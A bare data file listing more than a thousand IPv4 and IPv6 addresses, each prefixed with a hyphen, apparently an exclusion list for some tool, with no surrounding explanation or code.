-23.225.239.90 -45.76.90.46 -45.77.212.147 -139.162.24.191 -172.106.187.201 -74.208.199.78 -23.238.166.146 -107.180.85.188 -96.44.157.22 -107.165.201.114 -95.85.37.219 -45.40.136.105 -164.132.63.71 -115.146.122.232 -211.149.199.234 -185.13.56.228 -153.99.250.84 -219.153.12.11 -103.100.157.213 -107.180.84.79 -120.24.232.108 -107.6.168.131 -107.180.85.187 -139.224.25.74 -5.39.15.120 -162.243.107.153 -173.193.149.106 -120.77.252.181 -52.72.95.29 -23.88.82.188 -188.226.188.28 -217.182.101.254 -198.11.174.236 -115.146.126.253 -121.40.225.170 -35.201.145.125 -192.187.120.237 -51.255.215.68 -222.186.138.16 -133.130.66.207 -172.104.51.192 -5.45.72.187 -94.23.168.218 -185.28.191.10 -87.117.239.118 -217.23.11.106 -194.103.221.100 -60.8.63.25 -205.147.98.104 -103.100.157.165 -62.210.127.14 -120.78.71.133 -158.69.117.114 -199.89.1.8 -194.150.184.56 -45.35.102.132 -188.132.147.71 -45.32.255.65 -172.106.184.54 -128.199.111.19 -114.215.110.129 -133.242.114.172 -50.57.186.214 -125.253.127.156 -139.199.172.163 -138.197.199.206 -209.126.122.154 -108.61.44.90 -92.43.114.250 -112.124.6.246 -51.15.185.52 -119.23.225.147 -218.32.216.226 -207.154.233.170 -186.0.215.11 -54.243.225.253 -192.36.122.131 -101.71.20.244 -122.9.15.36 -61.155.5.35 -198.57.135.14 -62.210.12.133 -166.62.46.246 -37.187.116.122 -23.230.19.214 -183.146.209.67 -23.225.239.232 -121.40.40.7 -104.223.86.254 -91.134.26.198 -149.71.102.97 -103.100.157.177 -104.238.78.56 -154.66.112.10 -54.243.214.216 -86.104.177.85 -23.110.47.239 -192.169.217.114 -116.193.155.27 -103.205.82.11 -54.253.123.57 -122.9.163.204 -107.178.147.72 -115.29.179.177 -23.19.238.30 -99.192.206.162 -167.114.51.90 -86.104.177.18 -37.59.70.140 -118.193.192.162 -116.236.231.178 -94.23.73.33 -37.187.37.131 -121.41.25.138 -183.111.159.105 -117.18.7.108 -173.249.159.105 -180.96.11.54 -142.4.107.231 -58.20.108.8 -178.57.217.125 -194.110.129.7 -23.244.241.216 -195.154.180.49 -122.9.163.196 -139.224.19.94 -37.17.168.187 -89.234.32.170 -92.222.44.174 -45.114.94.173 -62.141.39.231 -120.55.243.173 -117.25.149.236 -23.238.176.243 -46.101.74.64 -193.19.69.70 -205.251.152.109 -212.252.213.250 -103.28.36.225 -64.120.123.234 -182.92.0.160 -50.116.63.108 -209.126.113.197 -116.236.231.190 -94.23.252.79 -45.114.94.250 -160.16.146.101 -23.225.0.161 -188.210.223.21 -103.239.30.53 -27.133.132.59 -5.35.250.131 -209.51.197.130 -92.53.108.155 -89.33.247.7 -59.110.157.237 -188.166.34.90 -176.31.115.126 -91.121.31.43 -169.54.224.6 -139.129.204.241 -217.199.165.5 -23.225.0.219 -23.225.239.102 -120.25.158.235 -14.0.85.4 -91.238.103.4 -67.228.171.209 -121.52.241.59 -54.80.85.37 -172.110.27.201 -185.122.140.77 -122.114.39.53 -91.121.226.239 -185.23.17.21 -138.68.73.208 -120.24.74.61 -222.73.52.241 -159.65.142.60 -23.225.239.40 -159.148.20.98 -23.110.47.204 -46.48.126.254 -162.254.252.112 -194.54.66.243 -23.19.202.38 -201.212.12.212 -211.149.186.100 -185.187.72.73 -37.59.210.65 -123.58.244.177 -180.235.137.72 -115.238.54.220 -115.29.229.72 -106.120.214.136 -185.200.229.19 -194.110.211.137 -103.218.242.252 -146.0.231.166 -173.236.115.19 -51.255.30.115 -151.80.205.2 -173.236.115.237 -91.219.57.179 -144.217.192.236 -164.52.150.249 -115.29.45.112 -151.80.172.20 -221.130.201.229 -194.19.246.83 -202.191.126.6 -120.77.157.90 -185.174.29.223 -113.56.35.235 -144.48.124.204 -103.205.2.76 -180.168.99.13 -104.224.205.99 -184.173.65.109 -178.33.45.124 -54.183.237.177 -188.166.29.70 -91.121.50.187 -54.76.246.47 -47.52.5.246 -104.243.42.179 -95.213.184.168 -189.90.55.11 -120.55.164.192 -112.74.47.226 -2a0a:7d80:1:7::105:113 -50.23.255.238 -173.236.115.254 -77.55.216.224 -2a0a:7d80:1:7::103:125 -46.105.128.30 -45.32.110.140 -128.199.177.227 -76.12.219.156 -128.199.128.113 -178.32.163.114 -72.249.182.35 -103.100.157.207 -23.110.47.237 -151.80.172.24 -103.12.51.38 -23.104.135.192 -149.56.232.11 -151.80.172.44 -101.132.151.39 -156.235.170.9 -199.96.170.21 -123.57.61.207 -111.230.132.107 -207.244.68.25 -45.32.117.105 -104.223.76.217 -115.29.167.54 -84.52.74.30 -178.33.164.17 -116.62.114.230 -118.98.75.81 -178.62.226.134 -116.125.126.98 -121.12.168.23 -37.139.24.163 -108.168.174.108 -121.254.159.68 -172.246.101.122 -172.246.101.20 -66.70.214.246 -210.83.81.218 -67.23.236.232 -194.44.37.162 -79.98.30.231 -2a0a:7d80:1:7::105:1ec -62.210.113.191 -47.93.14.6 -212.24.97.111 -58.216.8.218 -120.24.77.225 -69.64.57.175 -184.164.143.238 -120.25.156.158 -34.192.199.20 -142.4.107.104 -120.25.106.215 -23.244.241.80 -45.55.214.211 -124.204.34.170 -139.196.234.45 -114.215.135.35 -104.236.145.85 -159.148.20.100 -45.79.204.168 -107.165.201.132 -64.131.74.48 -2a0a:7d80:1:7::95:31c -91.121.41.33 -47.97.19.89 -202.52.134.238 -182.92.163.100 -121.42.225.174 -27.118.26.134 -202.183.135.33 -108.59.250.49 -45.55.147.221 -109.73.168.243 -138.197.76.189 -120.24.83.88 -65.60.59.122 -60.205.152.86 -45.35.99.175 -212.47.240.33 -52.30.250.66 -222.133.4.102 -213.189.62.232 -195.154.49.123 -121.196.199.59 -173.214.170.130 -157.7.171.165 -47.92.107.101 -5.135.224.61 -115.29.164.100 -203.155.20.147 -45.61.112.198 -178.20.156.54 -80.233.141.206 -114.215.150.205 -198.27.123.227 -85.254.126.95 -45.32.116.75 -5.45.77.171 -89.163.130.77 -45.33.50.61 -120.24.163.37 -94.130.235.36 -103.193.151.109 -47.89.41.175 -172.104.191.254 -64.64.12.48 -176.58.106.181 -23.225.0.23 -139.59.63.162 -121.42.247.229 -58.229.212.11 -54.168.249.27 -103.11.107.225 -106.15.207.182 -66.254.178.20 -65.60.43.164 -37.59.213.84 -172.107.64.58 -125.32.112.40 -37.59.213.81 -177.91.42.105 -74.206.184.235 -193.200.173.20 -114.215.44.73 -23.225.239.136 -117.48.195.232 -54.232.230.221 -37.46.129.148 -199.223.253.73 -91.205.174.54 -172.107.64.44 -122.194.11.218 -177.153.8.43 -23.104.135.251 -195.154.53.144 -5.45.68.87 -192.249.87.93 -45.61.115.41 -125.71.207.139 -125.65.108.222 -108.61.211.83 -45.77.78.79 -103.100.157.140 -172.255.159.205 -167.114.249.225 -163.172.144.40 -185.38.164.222 -118.193.139.160 -198.200.41.97 -45.56.81.93 -61.9.48.146 -188.165.220.114 -45.114.94.135 -103.198.45.3 -66.254.175.36 -188.226.146.95 -2604:a880:cad:d0::14:1001 -178.32.138.118 -191.96.231.101 -23.110.61.73 -192.241.225.27 -195.154.243.120 -119.29.143.13 -183.30.195.25 -216.17.104.215 -121.42.141.145 -198.199.77.102 -218.145.65.62 -103.239.28.6 -223.112.181.214 -156.235.169.190 -23.88.82.109 -112.124.37.196 -23.110.61.109 -104.199.172.167 -87.98.168.169 -23.238.145.84 -103.31.53.235 -43.224.33.155 -101.201.117.57 -196.11.82.60 -162.251.21.182 -139.224.57.104 -185.209.139.2 -184.154.181.204 -164.132.83.4 -210.4.60.69 -187.237.134.222 -185.57.10.150 -185.146.86.24 -121.42.235.78 -138.197.213.119 -182.23.34.148 -112.74.90.52 -121.42.182.39 -185.13.58.50 -92.222.202.240 -103.68.81.188 -121.40.153.249 -191.241.225.131 -5.153.22.83 -120.26.166.153 -136.243.33.107 -172.104.131.92 -111.231.137.167 -178.33.67.49 -80.233.244.57 -112.90.249.56 -82.146.50.151 -118.123.249.238 -192.163.211.17 -207.244.68.12 -106.38.223.56 -121.201.60.150 -85.254.126.79 -91.121.216.229 -95.211.157.215 -119.23.147.42 -54.167.126.56 -45.55.251.23 -113.10.199.245 -54.149.133.211 -139.59.213.228 -222.64.206.31 -5.79.104.4 -52.51.93.13 -119.126.157.13 -109.169.86.86 -123.207.244.112 -23.225.0.252 -153.122.67.227 -59.151.45.75 -13.126.37.106 -103.78.106.3 -62.75.146.56 -2a0a:7d80:1:7::93:22f -192.187.122.34 -5.135.58.110 -104.149.66.139 -175.138.30.146 -82.135.151.190 -103.235.242.42 -202.201.7.110 -36.32.8.117 -142.91.241.98 -195.154.165.42 -116.70.3.186 -91.224.140.163 -60.213.24.8 -95.128.131.185 -91.102.162.80 -103.100.157.199 -178.33.55.12 -198.49.67.210 -118.190.105.124 -112.213.122.90 -5.45.75.65 -209.148.92.28 -23.88.82.7 -5.135.63.99 -45.56.68.107 -192.232.196.77 -62.87.149.107 -64.6.101.139 -35.172.5.210 -47.52.147.212 -114.55.112.53 -217.65.8.57 -149.56.167.64 -192.155.252.210 -94.23.9.195 -185.15.185.12 -142.91.232.81 -201.62.64.40 -120.79.22.110 -104.156.230.107 -139.196.152.94 -59.188.25.215 -23.110.47.241 -45.35.102.182 -139.199.18.217 -115.29.224.75 -34.214.104.176 -217.182.204.197 -176.124.190.235 -192.99.150.65 -156.235.172.70 -122.114.96.11 -45.124.64.115 -94.130.122.45 -142.91.239.92 -216.17.111.23 -39.155.168.221 -182.18.174.75 -198.24.163.249 -2a0a:7d80:1:7::102:148 -2a0a:7d80:1:7::102:4a -23.110.47.199 -54.163.28.160 -167.114.54.84 -192.190.225.141 -204.44.67.7 -114.215.192.73 -192.99.109.21 -69.64.62.43 -107.6.212.186 -72.52.245.72 -121.41.53.251 -69.165.79.55 -23.225.0.92 -217.182.16.174 -103.74.121.179 -188.93.155.243 -173.236.43.133 -94.138.212.38 -185.163.100.109 -120.25.57.189 -103.205.3.100 -162.209.124.89 -149.56.13.91 -64.6.105.53 -107.22.183.192 -176.112.220.5 -180.150.186.209 -85.31.96.8 -121.127.246.181 -158.69.142.156 -107.165.201.98 -104.131.43.60 -23.225.0.86 -45.32.213.57 -207.210.67.205 -95.211.121.154 -133.242.226.107 -138.68.137.112 -128.199.163.162 -156.237.176.210 -68.169.51.188 -103.78.54.185 -142.91.232.80 -114.215.104.185 -185.27.134.136 -23.104.135.82 -198.15.127.131 -173.230.142.54 -118.184.34.53 -2001:9b0:113::6 -54.92.29.156 -198.200.41.2 -120.24.181.187 -149.56.9.26 -104.171.127.153 -50.116.27.89 -67.222.13.250 -184.107.194.27 -76.72.168.163 -120.25.223.195 -173.0.63.178 -50.28.98.220 -138.197.223.65 -177.93.110.23 -45.76.156.176 -54.38.10.192 -58.251.49.66 -5.196.208.126 -172.107.147.15 -172.106.186.40 -212.47.239.120 -120.26.4.86 -54.89.165.28 -185.115.32.93 -103.40.162.81 -108.61.44.92 -69.64.75.213 -23.88.82.66 -133.242.208.168 -45.35.102.165 -50.97.183.150 -103.233.156.35 -202.75.214.212 -148.251.162.134 -193.70.97.177 -23.225.0.237 -91.218.230.242 -62.63.190.4 -23.225.0.102 -218.32.216.177 -195.110.59.129 -96.126.104.250 -39.80.139.64 -23.111.164.85 -65.49.9.76 -153.122.9.9 -59.151.7.168 -101.251.195.195 -195.154.38.38 -66.254.177.76 -23.110.61.76 -59.42.88.227 -144.168.70.140 -120.26.136.103 -74.117.151.5 -221.234.42.13 -101.200.130.249 -80.77.95.10 -172.246.101.108 -120.77.1.73 -185.163.100.170 -23.238.129.124 -139.199.200.243 -128.199.250.149 -103.12.50.25 -107.152.102.234 -2.89.218.224 -170.238.15.134 -218.249.152.210 -103.49.10.156 -106.75.91.161 -92.222.78.223 -139.59.239.140 -107.190.233.76 -2a01:7e00::f03c:91ff:fe73:5fb4 -75.126.221.187 -173.236.115.120 -103.230.120.240 -120.26.122.11 -103.45.106.122 -69.165.74.102 -172.93.110.18 -139.199.79.26 -50.2.191.187 -49.212.201.106 -133.242.227.157 -52.193.255.141 -62.210.31.5 -65.60.5.71 -182.92.82.6 -2a0a:7d80:1:7::100:244 -59.46.189.162 -69.16.205.79 -103.41.126.65 -118.190.63.220 -194.19.246.77 -115.126.100.206 -120.27.218.231 -198.50.199.245 -218.93.37.206 -114.55.35.143 -198.13.54.91 -37.59.132.95 -54.252.212.212 -116.62.175.199 -23.238.176.201 -104.223.70.169 -204.225.127.80 -195.13.163.147 -91.238.177.15 -31.210.95.50 -210.73.83.156 -101.37.84.167 -198.200.41.37 -194.146.226.166 -194.19.246.40 -146.185.191.116 -2a0a:7d80:1:7::97:35 -151.80.7.175 -104.149.66.148 -217.23.4.236 -108.163.140.83 -104.130.194.72 -194.19.246.112 -65.60.43.169 -80.237.242.198 -69.164.199.195 -149.56.9.24 -218.3.69.138 -104.131.27.231 -1.85.30.138 -159.148.13.153 -72.1.245.79 -103.205.56.27 -185.17.29.11 -115.29.19.2 -111.113.10.129 -182.92.3.194 -112.74.14.26 -173.193.149.119 -142.91.241.114 -185.21.189.159 -192.34.26.30 -54.172.189.43 -54.250.171.241 -210.213.231.9 -82.208.18.110 -60.205.94.165 -78.47.111.11 -172.107.147.2 -46.101.220.63 -2600:3c03::f03c:91ff:fe89:4de6 -106.2.12.24 -27.118.26.3 -23.230.19.90 -66.85.76.139 -164.132.218.63 -114.55.101.26 -23.244.241.199 -91.109.242.24 -34.227.142.103 -172.104.35.97 -203.74.150.98 -45.33.62.57 -67.205.169.103 -192.81.249.192 -172.107.147.31 -67.228.175.239 -103.231.70.237 -190.116.40.66 -188.165.237.227 -216.92.250.22 -62.138.5.112 -78.108.89.86 -42.121.57.69 -128.199.176.99 -66.154.105.99 -185.171.24.200 -118.89.56.118 -146.185.158.175 -209.188.8.180 -50.62.60.212 -211.150.68.159 -172.246.101.159 -121.42.154.156 -47.89.49.112 -164.132.65.126 -198.58.80.77 -69.61.20.254 -207.99.46.154 -202.100.85.74 -159.180.249.105 -159.65.134.96 -69.61.64.172 -185.174.29.169 -95.143.83.207 -192.99.180.158 -52.198.158.115 -180.250.125.130 -106.14.73.100 -107.178.162.78 -142.44.149.205 -200.80.232.150 -172.104.59.175 -92.43.113.73 -2a02:2308::216:3eff:fea0:3a34 -118.190.96.95 -211.149.235.191 -139.99.100.171 -103.12.49.52 -46.20.236.40 -119.23.233.120 -188.120.250.155 -61.147.80.173 -139.162.35.5 -202.100.84.164 -116.236.231.177 -159.148.192.231 -65.60.3.198 -182.254.149.247 -52.201.69.89 -120.24.172.247 -172.252.10.202 -109.169.86.211 -162.243.111.194 -178.79.156.207 -103.249.106.121 -35.185.29.32 -164.132.108.32 -46.105.87.54 -54.196.168.123 -178.172.161.37 -193.54.33.146 -121.40.149.56 -91.230.194.91 -54.226.138.180 -210.210.155.68 -156.237.179.115 -167.114.205.137 -87.98.187.35 -45.114.94.246 -195.248.234.208 -39.108.228.68 -2600:3c01::f03c:91ff:feb0:ec70 -178.33.15.73 -190.152.45.250 -42.62.2.77 -42.112.28.157 -23.225.0.230 -188.132.180.109 -2001:470:18:ca::2 -128.199.65.175 -54.246.105.187 -103.235.234.198 -167.114.11.75 -104.250.135.17 -213.79.2.20 -120.36.133.210 -54.251.96.54 -120.25.144.182 -104.238.188.96 -156.67.218.229 -54.248.81.53 -185.80.152.99 -66.37.25.190 -162.243.137.80 -160.16.114.140 -121.43.59.174 -103.23.79.185 -50.22.198.212 -120.76.167.40 -60.205.58.71 -217.174.254.44 -34.193.127.2 -58.240.213.154 -101.95.183.246 -125.74.111.221 -180.97.224.193 -159.8.24.133 -120.78.165.43 -175.144.217.61 -104.149.66.145 -18.196.173.237 -45.113.160.86 -178.33.15.80 -217.13.50.40 -104.236.187.16 -128.199.82.172 -133.130.113.14 -162.220.240.132 -31.192.208.211 -160.16.118.136 -190.214.42.211 -167.114.160.7 -83.220.172.211 -121.40.180.155 -172.104.24.106 -107.191.41.151 -5.45.72.92 -45.114.94.95 -218.6.79.182 -209.51.208.58 -194.28.112.110 -66.103.16.64 -69.64.80.175 -51.15.63.200 -94.103.199.134 -104.203.82.159 -46.245.167.21 -111.230.108.138 -103.237.73.95 -109.195.198.50 -115.29.225.75 -35.168.22.177 -142.4.119.75 -2a0a:7d80:1:7::100:1bd -31.28.166.249 -209.236.126.69 -39.108.184.161 -23.225.89.202 -31.31.77.30 -159.148.192.226 -209.142.66.200 -198.1.83.142 -45.79.67.52 -192.36.123.129 -107.187.41.226 -173.244.217.87 -85.239.227.182 -107.190.235.74 -179.43.152.42 -115.28.237.59 -200.155.7.242 -88.214.242.111 -62.63.190.18 -103.195.31.159 -61.91.2.105 -115.159.1.181 -23.110.47.254 -47.96.164.239 -5.45.73.202 -65.60.26.123 -173.199.116.27 -122.9.18.140 -107.150.41.30 -101.132.41.36 -208.96.162.249 -81.200.38.42 -1.119.139.139 -23.225.0.218 -13.57.183.212 -103.223.133.27 -91.121.140.154 -128.199.161.38 -85.111.9.91 -185.163.100.196 -92.241.174.165 -156.237.178.142 -81.91.84.131 -5.135.161.180 -37.139.25.89 -74.86.126.231 -62.129.139.92 -107.180.68.124 -210.86.231.14 -91.227.16.25 -120.76.224.137 -173.193.149.127 -46.166.130.132 -194.242.112.118 -192.241.181.234 -61.187.56.43 -183.13.178.20 -41.162.9.48 -23.230.19.204 -178.32.190.92 -185.14.184.57 -184.95.36.86 -173.244.209.184 -113.103.12.181 -185.67.2.144 -60.18.162.202 -37.230.114.6 -103.12.49.5 -45.61.112.194 -5.45.75.9 -198.27.123.231 -69.16.215.149 -123.60.202.202 -178.32.89.223 -117.141.116.42 -161.202.202.235 -45.117.160.95 -41.215.35.42 -64.237.59.206 -95.47.161.47 -134.213.63.230 -194.190.68.77 -123.207.249.23 -125.88.187.215 -5.189.152.57 -185.50.131.76 -138.68.104.40 -95.140.47.22 -61.73.105.170 -47.100.168.218 -178.32.178.109 -5.101.97.12 -23.225.0.142 -54.173.148.188 -122.215.127.122 -150.95.149.147 -209.126.117.113 -2a0a:7d80:1:9::99:147 -183.134.23.35 -104.250.137.82 -95.173.182.57 -108.61.242.177 -198.58.80.101 -34.244.170.126 -128.199.42.84 -54.68.186.94 -45.35.125.60 -120.76.246.43 -217.23.4.193 -115.28.221.91 -23.238.145.86 -58.211.229.90 -54.226.255.155 -39.108.165.218 -125.119.235.246 -162.209.58.23 -176.58.113.153 -198.178.126.137 -37.97.184.80 -193.200.209.205 -43.243.74.22 -104.203.82.36 -2a0a:7d80:1:7::97:160 -91.224.16.2 -178.208.77.229 -151.80.7.174 -85.17.174.133 -94.74.66.106 -85.254.126.34 -222.186.3.36 -107.181.251.155 -112.126.89.234 -173.212.242.60 -170.75.149.80 -120.25.225.213 -61.183.237.194 -61.145.118.139 -132.148.14.66 -23.238.145.87 -185.153.221.12 -160.153.36.200 -180.150.162.191 -60.190.223.97 -59.151.103.77 -220.180.227.16 -185.85.191.132 -159.203.105.78 -103.205.0.96 -69.64.80.177 -51.254.153.98 -185.13.59.2 -167.114.240.142 -107.161.23.232 -63.142.254.30 -103.193.172.103 -185.26.122.149 -34.249.120.222 -54.173.152.76 -5.135.58.113 -54.166.73.231 -45.41.92.185 -192.99.201.135 -62.63.190.35 -123.60.202.249 -188.241.113.112 -95.211.157.217 -116.62.190.239 -65.60.5.72 -45.76.221.25 -164.132.18.237 -109.237.111.196 -120.26.137.176 -218.251.227.18 -158.69.176.206 -200.150.84.253 -114.215.140.158 -62.63.190.45 -46.171.145.14 -124.152.186.220 -89.33.247.6 -54.38.21.59 -103.198.45.31 -200.255.81.177 -209.133.199.178 -159.253.33.206 -140.116.246.218 -203.160.61.35 -37.187.253.219 -188.166.226.71 -45.61.115.8 -5.196.96.33 -45.119.118.74 -91.108.26.183 -51.254.5.202 -209.126.99.162 -94.23.213.10 -121.22.39.83 -192.158.13.217 -37.139.0.35 -169.54.24.226 -188.165.29.207 -23.244.241.11 -133.130.99.253 -155.94.156.77 -104.200.29.246 -49.212.176.177 -211.144.157.137 -172.104.68.74 -168.144.159.64 -159.148.37.112 -2001:fb0:1015:200:119:46:144:83 -213.183.146.76 -211.147.252.131 -120.76.55.162 -166.62.97.221 -218.28.12.113 -23.236.100.6 -69.65.50.66 -117.34.7.11 -165.227.183.245 -195.214.191.131 -167.114.77.214 -156.67.216.196 -59.92.234.124 -165.227.74.96 -107.6.84.117 -103.245.167.4 -69.164.192.98 -5.45.76.105 -116.62.243.232 -192.119.13.174 -134.119.172.54 -128.199.96.44 -178.32.158.59 -45.76.15.42 -185.224.91.131 -128.199.210.177 -169.54.224.7 -118.178.16.11 -121.40.28.156 -107.20.184.56 -120.77.168.165 -185.26.122.141 -171.244.8.153 -182.16.57.75 -190.145.102.178 -218.95.214.100 -188.165.27.233 -134.119.175.78 -66.70.192.187 -120.24.239.195 -23.224.115.16 -192.99.230.42 -119.29.167.191 -77.75.32.154 -192.99.224.147 -119.29.99.80 -95.142.163.44 -67.225.255.61 -50.18.247.135 -94.103.150.52 -88.214.242.117 -95.85.5.241 -5.39.70.69 -116.255.168.71 -97.107.132.147 -45.77.47.186 -195.154.211.200 -93.123.36.45 -133.242.201.141 -139.196.126.213 -139.59.185.242 -122.225.96.89 -93.90.183.172 -119.29.59.189 -198.58.80.103 -188.132.147.183 -196.45.115.16 -107.170.252.44 -120.24.81.48 -139.162.53.169 -165.227.104.148 -103.205.2.110 -114.55.231.169 -166.63.21.66 -106.15.0.211 -107.164.66.206 -188.210.221.136 -45.114.94.123 -109.169.86.237 -153.120.156.118 -45.77.148.39 -202.56.165.2 -45.114.94.45 -106.75.157.193 -23.225.0.205 -144.208.88.25 -66.254.176.67 -121.40.21.174 -188.226.175.85 -111.230.148.221 -112.225.62.20 -108.61.162.159 -216.17.108.183 -91.151.85.125 -185.85.239.242 -62.210.81.122 -54.227.245.164 -45.76.133.31 -158.255.252.129 -103.255.47.206 -121.40.96.145 -133.242.140.248 -202.133.113.140 -210.245.90.184 -23.110.47.251 -120.24.6.137 -211.152.51.212 -123.207.161.103 -23.21.195.252 -128.14.85.158 -116.231.152.163 -213.136.70.168 -172.107.147.51 -122.114.140.162 -120.25.201.27 -94.23.68.248 -211.149.213.64 -150.95.108.123 -116.255.174.30 -185.105.184.34 -118.190.82.67 -61.180.33.117 -121.42.238.126 -37.139.13.52 -136.0.69.2 -45.117.175.4 -185.85.191.134 -120.24.48.89 -64.120.123.238 -96.126.123.186 -109.169.76.49 -202.152.183.75 -23.238.176.236 -176.223.197.37 -156.67.216.195 -139.129.163.39 -167.114.59.54 -139.199.180.120 -59.106.217.11 -198.58.80.118 -185.69.53.29 -45.77.142.237 -144.217.70.85 -75.126.0.167 -208.167.225.104 -86.105.32.26 -34.242.220.245 -103.223.132.172 -216.14.126.59 -65.49.9.155 -110.86.21.202 -194.58.111.236 -2a0a:7d80:1:7::105:84 -165.227.75.58 -23.244.241.245 -139.196.18.245 -103.29.7.38 -138.201.187.67 -2001:470:1:7a:2000::996 -192.165.54.207 -185.27.132.70 -203.88.192.211 -2a0a:7d80:1:7::100:1d7 -101.200.201.155 -51.218.137.201 -103.232.87.165 -119.2.84.8 -211.149.195.144 -213.79.2.19 -178.62.116.121 -166.63.21.35 -205.209.155.213 -185.163.100.66 -192.165.172.228 -149.202.110.240 -23.92.77.52 -192.81.220.174 -180.153.55.133 -110.172.221.222 -54.175.119.248 -82.135.151.81 -139.224.194.136 -114.55.151.174 -149.56.46.120 -85.90.244.5 -139.196.49.165 -94.130.169.143 -51.255.170.28 -120.24.243.104 -2a0a:7d80:1:7::91:c5 -31.220.54.228 -120.27.146.141 -122.9.18.132 -121.201.33.12 -139.162.144.239 -61.191.27.114 -198.58.80.106 -172.255.159.229 -188.165.6.217 -114.80.203.109 -122.152.207.148 -202.32.152.25 -188.225.33.120 -122.9.229.143 -23.253.20.170 -112.124.57.99 -39.107.12.240 -117.4.240.216 -121.40.18.42 -86.106.137.180 -78.10.33.116 -45.42.94.167 -183.56.148.192 -23.238.166.157 -2400:8900::f03c:91ff:fe50:b992 -149.202.113.253 -121.42.231.159 -45.77.46.242 -23.225.0.201 -167.114.76.98 -198.23.88.83 -213.52.129.16 -207.152.186.20 -128.199.185.130 -202.51.228.21 -117.36.154.20 -23.225.89.91 -108.61.194.105 -13.126.66.110 -14.18.207.100 -145.239.172.0 -50.23.130.166 -120.55.66.19 -190.115.19.162 -185.10.99.35 -13.76.83.112 -106.75.28.234 -192.241.202.140 -185.13.58.39 -45.76.191.189 -103.72.165.75 -172.255.159.247 -210.48.246.55 -50.97.228.29 -23.104.135.22 -116.255.198.171 -118.190.61.34 -182.92.97.64 -23.244.241.179 -188.165.250.208 -107.164.66.248 -122.224.223.181 -144.217.243.13 -210.245.18.138 -106.186.23.202 -13.112.63.202 -45.55.208.213 -89.108.104.111 -91.215.137.148 -111.231.240.15 -5.45.73.124 -192.155.245.235 -119.23.140.181 -182.92.155.21 -123.57.2.104 -107.170.23.244 -115.159.96.208 -198.211.103.191 -198.24.161.109 -123.60.202.210 -208.86.0.70 -222.255.224.145 -180.150.186.210 -122.9.22.184 -103.231.70.233 -149.202.7.50 -69.61.20.252 -116.55.228.242 -94.23.159.21 -211.155.88.60 -107.178.147.120 -58.59.176.104 -89.202.190.146 -5.39.54.17 -177.69.103.168 -41.160.234.107 -123.57.34.1 -132.148.0.209 -45.64.184.253 -23.225.89.196 -198.58.80.91 -42.62.12.71 -218.93.127.86 -222.175.216.34 -153.99.255.25 -99.192.222.84 -120.27.196.224 -198.211.109.26 -118.178.57.158 -119.59.119.233 -198.200.41.77 -23.19.238.18 -49.1.244.131 -23.239.30.157 -89.39.104.230 -27.118.26.136 -194.58.103.104 -119.23.205.0 -112.124.9.238 -75.126.140.248 -220.170.194.5 -23.238.166.152 -79.142.57.188 -173.201.27.39 -39.108.84.187 -180.235.134.79 -23.225.0.3 -180.175.178.227 -194.146.226.169 -164.132.90.159 -66.37.25.182 -107.181.251.147 -90.80.131.187 -213.135.71.27 -213.6.128.100 -45.33.44.221 -104.203.82.87 -82.135.148.117 -72.52.136.9 -34.211.203.218 -91.203.70.150 -128.199.126.51 -139.224.42.94 -106.14.175.1 -95.47.156.26 -92.222.209.24 -103.96.73.199 -52.23.233.158 -113.98.254.60 -179.97.44.47 -185.27.134.58 -65.49.9.161 -116.236.231.166 -37.139.31.238 -150.95.183.139 -79.133.163.186 -123.56.108.87 -23.19.238.49 -114.215.83.226 -218.32.216.162 -37.187.34.192 -45.79.74.165 -85.23.253.22 -69.64.73.168 -184.173.65.108 -23.110.47.216 -208.115.124.21 -172.107.147.47 -120.55.191.118 -123.57.249.127 -80.76.169.86 -61.160.242.119 -103.208.32.243 -2400:8900::f03c:91ff:fe50:fb93 -149.71.103.101 -185.13.59.73 -167.114.173.78 -51.255.140.21 -125.212.196.243 -121.40.249.86 -222.221.255.114 -103.28.38.116 -192.41.229.6 -94.102.5.37 -51.15.190.221 -188.132.135.51 -5.255.93.230 -198.24.163.239 -133.130.106.176 -60.212.47.247 -42.121.31.32 -107.190.233.73 -211.149.249.55 -178.32.51.165 -123.81.222.130 -182.255.0.90 -109.169.86.90 -115.28.130.226 -115.29.47.19 -134.119.171.25 -91.134.193.234 -120.24.213.152 -23.225.89.50 -58.59.2.10 -93.115.31.48 -31.179.254.213 -142.91.95.97 -89.239.130.115 -103.48.82.30 -106.15.94.230 -188.165.16.37 -80.84.230.20 -109.236.85.172 -182.92.80.9 -128.199.60.166 -144.168.124.13 -103.205.3.118 -112.78.10.126 -172.107.165.32 -91.221.89.147 -121.52.243.53 -54.202.140.77 -121.41.52.171 -218.85.137.43 -2a0a:7d80:1:7::96:3c0 -121.196.221.29 -118.190.139.84 -66.70.224.231 -185.163.100.244 -159.122.78.249 -185.163.100.50 -149.56.156.67 -101.200.177.244 -58.210.225.130 -104.203.82.51 -47.94.130.250 -106.14.117.228 -142.91.95.165 -47.96.180.136 -188.226.172.99 -5.45.76.110 -27.197.40.128 -45.61.112.7 -195.201.54.199 -149.202.220.143 -45.41.92.169 -64.237.35.211 -220.180.111.160 -153.126.137.175 -34.200.129.29 -61.184.95.71 -54.146.35.167 -103.28.38.27 -119.23.37.20 -37.140.197.114 -182.16.58.36 -89.111.162.37 -88.212.220.144 -192.3.239.141 -82.196.14.209 -178.62.117.159 -85.25.237.170 -195.91.162.218 -195.154.36.73 -172.252.10.61 -123.56.179.154 -84.95.241.182 -192.99.230.44 -2a0a:7d80:1:7::106:1b9 -88.99.243.182 -117.131.144.100 -65.181.121.195 -173.82.206.74 -213.128.66.126 -2a0a:7d80:1:7::107:149 -1.245.107.161 -103.227.130.55 -45.125.48.216 -162.220.219.101 -60.29.120.65 -166.62.45.108 -115.124.125.134 -216.14.112.177 -47.93.27.45 -163.172.157.164 -221.6.167.100 -77.120.126.248 -103.1.40.186 -120.77.148.250 -120.76.121.168 -149.202.234.119 -122.9.163.247 -120.55.125.181 -163.47.157.204 -101.251.192.49 -202.97.183.146 -218.6.13.68 -116.62.136.195 -58.18.252.205 -103.11.96.15 -107.165.201.83 -23.19.237.57 -153.126.213.23 -162.243.35.247 -113.107.188.175 -23.238.145.91 -54.225.85.84 -5.135.224.43 -61.175.103.2 -124.243.223.14 -132.148.85.16 -217.89.28.100 -176.67.169.217 -121.40.157.67 -178.32.98.186 -122.114.45.75 -223.84.250.72 -79.137.36.235 -49.212.175.83 -185.10.99.38 -69.87.199.11 -109.169.86.167 -66.70.214.249 -118.82.9.199 -199.241.188.163 -51.255.17.48 -107.178.147.102 -46.4.67.90 -195.154.179.12 -47.100.190.115 -109.232.224.15 -67.222.5.200 -123.207.96.156 -144.168.71.132 -163.44.193.75 